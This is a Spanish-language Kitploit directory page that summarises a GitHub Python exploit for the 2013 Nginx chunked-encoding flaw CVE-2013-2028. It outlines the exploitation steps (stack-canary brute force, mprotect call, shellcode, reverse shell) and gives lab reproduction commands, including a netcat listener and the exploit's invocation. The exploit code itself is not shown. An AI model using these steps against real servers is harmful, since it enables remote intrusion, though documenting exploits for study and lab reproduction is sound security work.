Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2013-2028-Exploit — Exploit en Python para CVE-2013-2028 | Kitploit
Herramientas/GitHubGitHub/m4drat/cve-2013-2028-exploit
Análisis de VulnerabilidadesExplotaciónShellcodeExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de PayloadsExplotación de Binarios
GitHubm4drat/cve-2013-2028-exploit

CVE-2013-2028-Exploit

Exploit en Python para CVE-2013-2028

Ver Repositorio
192hace 6 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit CVE-2013-2028

Detalles de la vulnerabilidad

Software vulnerable: Nginx 1.3.9 < 1.4.0
Commit con la corrección: https://github.com/nginx/nginx/commit/4997de8005630664ab35f27140e2077e818b21a7

La vulnerabilidad existe en la función ngx_http_parse_chunked. Este exploit desencadena un desbordamiento de entero en ngx_http_parse_chunked y, posteriormente, lo utiliza para desbordar la pila y secuestrar el flujo de control.

Detalles de la explotación

El exploit real contiene 4 pasos:

  1. Encontrar el valor del canario de pila mediante fuerza bruta byte a byte.
  2. Calcular la dirección de mprotect usando el valor de rcx (apunta a algún lugar de lpthread). Llamar a mprotect con los argumentos adecuados.
  3. Copiar el shellcode a una ubicación de memoria RWX.
  4. Saltar al shellcode e iniciar una reverse shell.

Cómo reproducir

  1. Iniciar un listener en el sistema host, por ejemplo usando netcat: nc -lvp 4345
  2. En la máquina virtual, iniciar docker: sudo docker-compose up --build
  3. Ejecutar el exploit: python2 exploit.py -ra 127.0.0.1 -rp 8081 -la <listener machine address> -lp <listener machine port>
  4. Dejar que el exploit encuentre el valor real del canario e inicie la reverse shell.

Demo

Descargar herramienta